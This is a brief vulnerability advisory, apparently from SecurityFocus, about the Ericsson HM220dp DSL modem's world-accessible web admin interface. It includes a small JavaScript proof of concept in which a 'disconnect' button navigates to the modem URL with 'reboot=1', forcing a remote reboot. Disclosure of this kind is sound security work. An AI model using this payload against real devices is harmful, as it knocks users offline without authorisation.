Ericsson HM220dp DSL Modem World Accessible Web Administration Interface Vulnerability

There is no exploit code required.

The following proof of concept has been supplied:
[script]
function exploit(){
window.location = "view-source:http://www.example.com/dummy.html?reboot=1";
}
[/script]
[input type="button" value="disconnect" onClick="exploit();"]


 

Privacy Statement
Copyright 2010, SecurityFocus